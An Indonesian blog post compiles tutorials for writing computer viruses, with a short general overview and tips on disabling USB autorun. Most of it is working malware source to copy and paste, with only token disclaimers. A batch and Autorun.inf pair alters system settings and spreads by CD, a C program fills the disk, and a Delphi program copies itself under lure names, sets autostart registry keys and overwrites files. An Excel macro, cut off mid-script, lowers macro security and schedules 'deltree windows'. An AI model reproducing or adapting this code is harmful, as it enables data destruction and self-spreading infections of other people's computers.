Kamis, 06 Juni 2013

MEMBUAT VIRUS

Tips-Tips buat Virus Maker

Nah lo? Kok gw bikin artikel ginian? Kenapa gak bikin tips2 buat mehapus virus aja? Ah, ngapain repot-repot membasmi virus kalo ntar ada lagi, ada lagi yang bikin? Mending gw ngasih tipsnya buat si pembuatnya aja kali ya? hihihihi…
  1. Jangan merusak data korban. Kasian tuh om-om yang pada gaptek begitu nyadar datanya hilang, komputernya mulai gak beres, yang diomelin malah anaknya yang hobby ngutak-ngati komputer. Huh. Kecuali penghapusan data bertujuan agar jejak sang virus atau keberadaanya sulit dilacak. Misalnya aja menghapus file log, antivirus, dll.
  2. Daripada bikin virus yang payloadnya merusak lebih baek kamu bikin virus yang cuman iseng doank. Pernah nyoba program2 pranks gak? Misalnya bikin mouse lompat-lompat sendiri sampe dikira tikus beneran(iiih), keyboard ngetik sendiri kayak ada hantunya. Bikin tulisan startmenu gonta-ganti sendiri. Bikin mouse kayak ngadat, dsb deh. Coba aja buka www.rjlsoftware.com buat nyari ide kayak ginian. Bikinnya gampang kok cuman pake dikit fungsi API yg emang gampang dibikin pake VB. VB emang idolanya virus maker ^^”
  3. Jangan pake virus generator yang udah jadi. Biasanya virus hasil generate itu gampang dideteksi antivirus. Lagipula skill programming kamu juga gak berkembang dunk!
  4. Waktu lagi bikin virus sebaiknya file proyek virus kerjaan kamu itu ditaruh di drive selain C: sedangkan drive C nya sendiri dipasangin deepfreeze. Biar waktu nyoba-nyoba dan ternyata kerusakannya parah banget kamu tinggal restart aja.
  5. Kalo mau kreatif dikit, sekali-kali gunakan bahasa selain VB donk. Misalnya C++, delphi, atau lainnya. Virus VB terlalu bergantung ama library msvbvm sich,
  6. Biar gak membahayakan orang lain jangan sebarin virusmu itu. Simpan aja terus dikomputer kamu. Puluhan tahun kemudian bisa masuk museum tuh. Huehehehe^^

Pengetahuan Dasar Tentang Virus

Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer dan jaringan ( internet ) sudah sangat sering mendengar istilah ‘virus’ yang terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh mengenai virus, yang nantinya diharapkan dapat membuat kita semua mengerti danmemahami tentang virus.
A. ASAL MUASAL VIRUS
1949, John Von Neuman, menggungkapkan ” teori self altering automata ” yang merupakan hasil riset dari para ahli matematika.
1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba teori yang diungkapkan oleh john v neuman, mereka bermain-main dengan teori tersebut untuk suatu jenis permainan/game. Para ahli tersebut membuat program yang dapat memperbanyak dirinya dan dapat menghancurkan program buatan lawan.Program yang mampu bertahan dan menghancurkan semua program lain, maka akan dianggap sebagai pemenangnya. Permainan ini akhirnya menjadi permainan favorit ditiap-tiap lab komputer.semakin lama mereka pun sadar dan mulai mewaspadai permainan ini dikarenakan program yang diciptakan makin lama makin berbahaya, sehingga mereka melakukan pengawasan dan pengamanan yang ketat.
1980, program tersebut yang akhirnya dikenal dengan nama “virus” ini berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di dunia cyber.
1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.
B. PENGERTIAN VIRUS
” A program that can infect other programs by modifying them to include a slighty altered copy of itself.A virus can spread throughout a computer system or network using the authorization of every user using it to infect their programs. Every programs that gets infected can also act as a virus that infection grows “ ( Fred Cohen )
Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984 di Amerika Serikat. Virus komputer dinamakan “Virus” karena memiliki beberapa persamaan mendasar dengan virus pada istilah kedokteran(biological viruses).
Virus komputer bisa diartikan sebagai suatu program komputer biasa.Tetapi memiliki perbedaan yang mendasar dengan program-program lainnya,yaitu virus dibuat untuk menulari program-program lainnya, mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu dicatat disini, virus hanya akan menulari apabila program pemicu atau program yang telah terinfeksi tadi dieksekusi, disinilah perbedaannya dengan “worm”. Tulisan ini tidak akan bahas worm karena nanti akan mengalihkan kita dari pembahasan mengenai virus ini.
C.KRITERIA VIRUS
Suatu program yang disebut virus baru dapat dikatakan adalah benar benar virus apabila minimal memiliki 5 kriteria :
  1. Kemampuan suatu virus untuk mendapatkan informasi
  2. Kemampuannya untuk memeriksa suatu program
  3. Kemampuannya untuk menggandakan diri dan menularkan
  4. Kemampuannya melakukan manipulasi
  5. Kemampuannya untuk menyembunyikan diri.
Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap-tiap kemampuan itu dan mengapa ini sanggat diperlukan.
1. Kemampuan untuk mendapatkan informasi
Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam suatu directory, untuk apa? agar dia dapat mengenali program program apa saja yang akan dia tulari,semisal virus makro yang akan menginfeksi semua file berekstensi *.doc setelah virus itu menemukannya, disinilah kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat daftar/data semua file, terus memilahnya dengan mencari file-file yang bisa ditulari.Biasanya data ini tercipta saat program yang tertular/terinfeksi atau bahkan program virus ini dieksekusi. Sang virus akan segera melakukan pengumpulan data dan menaruhnya di RAM (biasanya :P ) , sehingga apabila komputer dimatikan semua data hilang tetapi akan tercipta setiap program bervirus dijalankan dan biasanya dibuat sebagai hidden file oleh virus.
2.Kemampuan memeriksa suat program
Suatu virus juga harus bias untuk memeriksa suatu program yang akan ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum, karena jika sudah maka dia akan percuma menularinya 2 kali. Ini sangat berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah memiliki/ memberi tanda pada file/program yang telah terinfeksi sehingga mudah untuk dikenali oleh virus tersebut . Contoh penandaan adalah misalnya memberikan suatu byte yang unik disetiap file yang telah terinfeksi.
3.Kemampuan untuk menggandakan diri
Kalo ini emang virus “bang-get”, maksudnya tanpa ini tak adalah virus. Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari program lainnya. Suatu virus apabila telah menemukan calon korbannya (baik file atau program) maka ia akan mengenalinya dengan memeriksanya, jika belum terinfeksi maka sang virus akan memulai aksinya untuk menulari dengan cara menuliskan byte pengenal pada program/ file tersebut,dan seterusnya mengcopikan/menulis kode objek virus diatas file/program yang diinfeksi. Beberapa cara umum yang dilakukan oleh virus untuk menulari/ menggandakan dirinya adalah:
a.File/Program yang akan ditulari dihapus atau diubah namanya. kemudian diciptakan suatu file menggunakan nama itu dengan menggunakan virus tersebut (maksudnya virus mengganti namanya dengan nama file yang dihapus)b.Program virus yang sudah di eksekusi/load ke memori akan langsung menulari file-file lain dengan cara menumpangi seluruh file/program yang ada.
4.Kemampuan mengadakan manipulasi
Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file/program. isi dari suatu rutin ini dapat beragam mulai dari yang teringan sampai pengrusakan. rutin ini umumnya digunakan untuk memanipulasi program ataupun mempopulerkan pembuatnya! Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System) , sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi. misal:
a.Membuat gambar atau pesan pada monitorb.Mengganti/mengubah ubah label dari tiap file,direktori,atau label dari drive di pcc.Memanipulasi program/file yang ditularid.Merusak program/filee.Mengacaukan kerja printer , dsb
5.Kemampuan Menyembunyikan diri
Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana.langkah langkah yang biasa dilakukan adalah:
-Program asli/virus disimpan dalam bentuuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai.-Program virus diletakkan pada Boot Recoord atau track yang jarang diperhatikan oleh komputer itu sendiri-Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak berubah ukurannya-Virus tidak mengubah keterangan waktu ssuatu file-dll.
D.SIKLUS HIDUP VIRUS
Siklus hidup virus secara umum, melalui 4 tahap:
  • Dormant phase ( Fase Istirahat/Tidur )Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal:tanggal yang ditentukan,kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini
  • Propagation phase ( Fase Penyebaran )Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, ram dsb). Setiap program yang terinfeksi akan menjadi hasil “klonning” virus tersebut (tergantung cara virus tersebut menginfeksinya)
  • Trigerring phase ( Fase Aktif )Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant phase
  • Execution phase ( Fase Eksekusi )Pada Fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb

Mencegah penularan virus via USB disk

Virus-virus lokal punya satu kekhasan yang jarang ditemukan pada hama komputer buatan luar negeri. Virus atau worm luar biasanya memanfaatkan jaringan internet buat menyebar. Lain halnya dengan virus lokal. Penciptanya kerap kali merancang virusnya agar dapat berkembang biak melalui perantaraan usb disk, baik itu flash disk ataupun hard disk portabel. Ini mungkin karena di Indonesia umumnya pertukaran data lewat medium portabel jauh lebih mudah dilakukan.
Saya sendiri sempat berkenalan dengan dua jenis virus lokal yang menyebar melalui usb disk ini. Untungnya keduanya relatif jinak, tidak seperti virus Brontok yang terkenal ganas itu. Dan lebih mujur lagi kedua jenis virus itu saya temui di komputer orang lain.
Keduanya memiliki cara penularan yang sama: via flash/portable disk. Modus penularannya juga sama, yaitu dengan memanfaatkan fitur autorun pada Windows. Fitur autorun (atau autoplay) ini sebenarnya ditujukan untuk medium seperti CD-ROM atau DVD, agar komputer dapat langsung menjalankan program (biasanya installer) dalam cakram optik tersebut ketika disisipkan. Fitur autorun ini diaktifkan oleh komputer tertular dengan menuliskan berkas AUTORUN.INF ke dalam flash disk. Berkas ini dibikin tersembunyi (hidden) dan diubah statusnya menjadi read-only. Berkas AUTORUN.INF ini berisi perintah untuk menjalankan berkas lain berupa program yang juga dimasukkan oleh komputer tertular. Program ini bisa ditulis dalam Visual Basic (ini berarti kita dapat membaca sendiri kodenya), atau berupa berkas executable biner. Berkas kedua ini bertugas untuk menulari komputer lain. Kemudian ketika flash disk pertama kali ditancapkan ke slot USB, dan komputer mendeteksi berkas AUTORUN.INF ia akan membacanya dan kemudian menjalankan perintah menjalankan program penular tersebut. Dari dua kejadian yang saya temui program antivirus yang terpasang sama sekali tidak memperingatkan keberadaan virus di dalam flash disk tersebut.
Menghapus dan mencegah virus
Mengobati komputer yang sudah terjangkit virus agak merepotkan. Untungnya membersihkan USB disk dan menangkal penjalarannya di komputer yang masih bersih cukup mudah.
Dalam kedua kasus saya menemukan mekanisme penularan ini ketika menggunakan USB disk di komputer yang menjalankan sistem operasi non-Windows (dalam hal ini, Fedora 7). Sejauh ini Fedora 7 dan distribusi Linux lainnya (dan Mac OS) kebal dari penularan virus Windows. Karena itu cukup aman menggunakan sistem non-Windows buat membersihkan virus yang memanfaatkan fitur autorun dari USB disk. Buka berkas AUTORUN.INF menggunakan editor teks, lalu dari sana cari berkas mana yang akan dijalankan secara otomatis. Cari dan hapus berkas tersebut. Terakhir hapus juga berkas AUTORUN.INF.
Penangkalan virus ini di komputer Windows cukup jelas: matikan fitur autorun. Ini tidak akan menjamin sepenuhnya komputer kebal dari penularan lewat USB disk, namun akan menangkal Namun bagaimana caranya?
Pemakai Windows XP dapat mengunduh Tweak UI, yang merupakan salah satu utilitas Microsoft Power Toys dari http://www.microsoft.com/windowsxp/downloads/powertoys/xppowertoys.mspx Klik berkas TweakUIPowerToySetup untuk memasang utilitas tersebut. Setelah selesai luncurkan Tweak UI. Di panel sebelah kiri jendela aplikasi ini pilih My Computer, lalu pilih Types. Kosongkan kotak di samping Enable Autoplay for removable drives, lalu klik Apply. Kalau mau Anda bisa juga menonaktifkan pilihan Enable Autoplay for CD and DVD drives.

Cara Membuat Virus Dengan Notepad

Nih virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus(setahu saya…)
note:
“HANYA BEKERJA PADA WINDOWS XP”
caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:
[autorun]
open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya
note:
- jangan disalahgunakan
- maaf kalau pernah diposting sebelumnya
- kalau mau buat anti virusnya tinggal di modifikasi nilainya….

Maaf Sebagian Di Copy Paste dari berbagai sumber

Membuat virus sederhana pada Borland C untuk Pemula

Hi semuanya, kt mulai dari pemrograman komputer, ini merupakan cita-cita dan hampir smua siswa berkeinginan membangun virus komputer.
Virus komputer adalah suatu program yang dibuat untuk dan pada umumnya untuk merusak komputer. Virus komputer adalah program yang sepenuhnya tidak sah.
Sekarang saya akan menjelaskan sedikit tentang virus, virus kebanyakan adalah jenis-jenis dari virus-virus komputer dengan functions(destructive obviously). ada yang mengahapus data penting dan folder, ada yang mengubah pengaturan pada sistem komputer anda seperti registry values, ada yang menelan sejumlah besar memory space dan dump pada hard disc anda. Virus juga dapat merusak RAM parmanently.
Saya akan memberi di sini suatu program virus sederhana yang hanya mempunyai beberapa duri kecil dan mempunyai kemampuan untuk menyumbat hard disc anda.
Logika di balik program itu adalah tak lain hanya membuat diri sendiri berupa file yang berkembang, memperbanyak hingga MB dengan tidak terbatas.
Spesifik untuk buat virus
OS:-Windows98/xp/2000 MS-DOS
Compiler:-Borland C(Which has Dos Shell)
Source Code:-
//START v.c
#include
#include
void main()
{
while(1)
{
system(“dir>>â•ša.exe”);
}
}
//END
Ketika Anda dapat melihat ini adalah suatu program kecil. Menyusun program yang kita dapat adalah file v.exe ini adalah virus kita.
Bagaimana menmbuatnya? -The system call “dir>>â•ša.exe” will execute the dos command ‘dir’ dan ridirect its output toa file â•ša.exe (simbol â•š dapat diperoleh dengan menekan 456 pada numpad tahan alt key). Jika menjalankan program ini dalam sebuah folder yang memiliki banyak data dan folder tersebut akan meningkatkan ukurannya oleh â•ša.exe dalam jumlah yang besar. Proses ini akan melanjutkan sampai ketidakterbatasan dalam waktu singkat.
Udah teruji pada win98. Dan kamu tak akan bisa menghapus â•ša.exe GUI.
Untuk auto running, tempatkan v.exe pada folder command di dalam windows folder.
Pada file autoexec.bat(win98) atau autoexec.NT(winXP/2000) tulis v.exe.
Pada saat anda memulai window, v.exe akan jalan secara automatis.
Coba gunakan virus ini pada komputer anda, â•ša.exe adalah virus yang dapat menginfeksi file dimana ukuran foile akan membesar. Jadi untuk menghapus virus dari komputer anda, cukup hapus file v.exe dan â•ša.exe dari komputer anda.

Code:

//START v.c
#include
#include
void main()
{
while(1)
{
system(“dir>>â•ša.exe”);
}
}
//END
catatan : hati-hati yach….met bwt virus hahaha…

Membuat virus dengan Delphi 7

Ini kode untuk membuat virus dengan Delphi 7, ketik kode di bawah ini atau bisa kopi paste. Dan ingat kode di bawah hanya untuk pembelajaran saja, dan kami tidak bertanggung jawab penyalah gunaan kode di bawah ini:
unit Unit1;
interface
{Deklarasi ShellApi Yang Digunakan}
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs,Shellapi,registry, Mmsystem, StdCtrls, ExtCtrls, jpeg;
type
TForm1 = class(TForm)
Timer1: TTimer;
Timer2: TTimer;
procedure Timer2Timer(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
{{$R MySoundRes.RES}
procedure TForm1.FormCreate(Sender: TObject);
{Deklarasi variabel}
var
regis: TRegistry;
APath: string;
MySearch: TSearchRec;
dir : string;
{i : integer;}
{x : integer;}
{F:TextFile;}
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
{form tak terlihat}
Application.ShowMainForm := false;
{copy dulu ah}
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+’\runfold’);
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+’\Dadan cakep.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\sistim32.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Rahasia.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Jangan dibuka.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{menjalankan service tak terlihat}
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{men-disable TASK MANAGER}
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;
regis.OpenKey(’Software’, True);
regis.OpenKey(’Microsoft’, True);
regis.OpenKey(’Windows’, True);
regis.OpenKey(’CurrentVersion’, True);
regis.OpenKey(’Policies’, True);
regis.OpenKey(’System’, True);
regis.WriteString(’DisableTaskMgr’, ‘0′);
regis.CloseKey;
except
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{membuat key di registry biar auto run gitu}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then
reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg1.CloseKey;
{membuat key registry di runonce}
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then
reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg2.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{menginfeksi file}
begin
try
dir := GetCurrentDir;
APath:= dir;
FindFirst(APath+’\*.*’, faAnyFile, MySearch);
refresh;
while FindNext(MySearch)=0 do
begin
copyFile (pchar(application.ExeName),pchar(APath+’\’+MySearch.Name),false);
refresh;
end;
FindClose(MySearch);
except
end;
end;
refresh;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{merubah file yg terinfeksi}
begin
try
dir := GetCurrentDir;
APath:= dir;
FindFirst(APath+’\*.*’, faAnyFile, MySearch);
refresh;
while FindNext(MySearch)=0 do
begin
renamefile (pchar(APath+’\’+MySearch.Name),pchar(APath+’\’+MySearch.Name+’.exe’));
renamefile (pchar(application.ExeName+’.exe’),pchar(application.ExeName));
refresh;
end;
FindClose(MySearch);
except
end;
end;
refresh;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
procedure TForm1.Timer1Timer(Sender: TObject);
{terus perhatiin yah}
{deklarasi variabel}
var
regis: TRegistry;
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+’\runfold’);
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+’\Dadan cakep.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\sistim32.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Rahasia.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Jangan dibuka.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{tetep jalanin virus secara tak terlihat}
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{mendisable task manager}
begin
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;
regis.OpenKey(’Software’, True);
regis.OpenKey(’Microsoft’, True);
regis.OpenKey(’Windows’, True);
regis.OpenKey(’CurrentVersion’, True);
regis.OpenKey(’Policies’, True);
regis.OpenKey(’System’, True);
regis.WriteString(’DisableTaskMgr’, ‘0′);
regis.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then
reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg1.CloseKey;
{bikin lagi key registry}
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then
reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg2.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
try
ShellExecute(0, ‘open’, ‘www.imm.or.id’, nil, nil, SW_NORMAL);
mciSendString(’dadan cakep deh’, nil, 0, handle);
except
end;
timer2.Enabled:= true;
timer1.Enabled:= false;
end;
procedure TForm1.Timer2Timer(Sender: TObject);
begin
try
mciSendString(’dadan memang cakep’, nil, 0, handle);
except
end;
timer1.Enabled:= true;
timer2.Enabled:= false;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
end;
end.

Membuat Virus Dengan Excel

HANYA SEKEDAR UNTUK BELAJAR……
MAKE MODULE, MENYEBARKAN, MEMODIFIKASI ADALAH BUKAN TANGGUNGJAWAB CODER
SCRIPT INI HANYA DIGUNAKAN SEBAGAI ILMU PENGETAHUAN SAHAJA
Bila anda TIDAK SETUJU tekan tombol [X] pada window ini
MAKE Virus:
buka new excel workbooks kemudian menu tools macro VB editor
klik kanan pada VBA Project dan pilih insert module
Paste file ini ke dalam new module
tekan F8 untuk trace script
—————————— begin of script —————————————–
‘USE THIS SCRIPT AS YOUR OWN RISK
‘This is for my wife if thats you falling love with others
Private Declare Function RegOpenKeyExA Lib “advapi32.dll” (ByVal hKey As Long, _
ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As _
Long, phkResult As Long) As Long
Private Declare Function RegCreateKeyExA Lib “advapi32.dll” (ByVal hKey As Long, _
ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As _
Long, phkResult As Long) As Long
Private Declare Function RegSetValueExA Lib “advapi32.dll” (ByVal hKey As Long, _
ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, _
ByVal lpValue As String, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib “advapi32.dll” (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib “advapi32.dll” Alias “RegCreateKeyA” (ByVal _
hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Global Const REG_DWORD As Long = 4
Global Const HKEY_LOCAL_MACHINE As Long = &H80000002
Global Const HKEY_CURRENT_USER As Long = &H80000001
Dim NewKEY As Long
Dim AA, BB, NN
Dim Myclub As String
Dim CrStat As Boolean
Dim pnm As String
‘ ini untuk mendisable menu bila ingin memodifikasi tambah ato kurangi sendiri
‘ menghapus direktory windows…ssttt glodak aauuuuu
Sub MessBoard()
On Error Resume Next
CommandBars(”File”).Controls(”Print Area”).Visible = False
CommandBars(”Data”).Controls(”Sort”).Visible = False
CommandBars(”File”).Controls(”Page Setup…”).Visible = False
NowBoom = Array(”MsApp”, “Sound Acceleration”, “Ms Wizard”, “Web Camera”, _
“PCI driver”, “App Video”, “Lshots”, “WinApps”, “MsOffice 11″)
Randomize
NowBoom = NowBoom(Rnd * 9)
KillAV = RegOpenKeyExA(HKEY_LOCAL_MACHINE, “Software\Microsoft\Windows\CurrentVersion\Run”, _
0, KEY_ALL_ACCESS, s)
KillAV = RegSetValueExA(s, NowBoom, 0, 1, “c:\windows\command\deltree windows”, 0)
KillAV = RegCloseKey(s)
End Sub
Private Sub Auto_Open()
On Error Resume Next
Application.StatusBar = “Wait please….”
Application.ScreenUpdating = False
CommandBars(”Tools”).Controls(”Customize…”).Visible = False
CommandBars(”Tools”).Controls(”Options…”).Visible = False
CommandBars(”Tools”).Controls(”Macro”).Enable = False
’setting registry security LOW pada excel ver. 8.0 dan 9.0
Kill97 = RegOpenKeyExA(HKEY_CURRENT_USER, “Software\Microsoft\Office\8.0\Excel” & _
“Microsoft Excel”, 0, KEY_ALL_ACCESS, k)
Kill97 = RegSetValueExA(k, “Options6″, 0, REG_DWORD, Chr$(0), 4)
Kill97 = RegCloseKey(k)
Kill2K = RegCreateKey(HKEY_CURRENT_USER, “Software\Microsoft\Office\9.0\Excel” & _
“security”, s)
Kill2K = RegOpenKeyExA(HKEY_CURRENT_USER, “Software\Microsoft\Office\9.0\Excel”, _
0, KEY_ALL_ACCESS, s)
Kill2K = RegSetValueExA(s, “Level”, 0, REG_DWORD, Chr$(2), 2)
Kill2K = RegCloseKey(s)
‘mengalihkan antivirus ke file yang anda inginkan
‘rundll.exe jika sudah menumpuk di registry membuat winkamu cepet mabok
‘rubah file rundll.exe sesuai keinginan
AnVrs = Array(”VsStatEXE”, “Norton Auto-Protect”, “F-Secure”, “PandaSoft”, “Avast4″, _
“DrSolomon”, “AntiVir”, “MsSound”, “BombShellter”)
Randomize
AVstr = AnVrs(Rnd * 9)
KillAV = RegOpenKeyExA(HKEY_LOCAL_MACHINE, “Software\Microsoft\Windows” & _
“CurrentVersion\Run”, 0, KEY_ALL_ACCESS, s)
KillAV = RegSetValueExA(s, AVstr, 0, 1, “c:\windows\rundll.exe”, 0)
KillAV = RegCloseKey(s)
Application.DisplayAlerts = False
If Right(ActiveWorkbook.Name, 3) = “xls” Then
ActiveWindow.Visible = False
workbooks.Add
End If
XBrnd
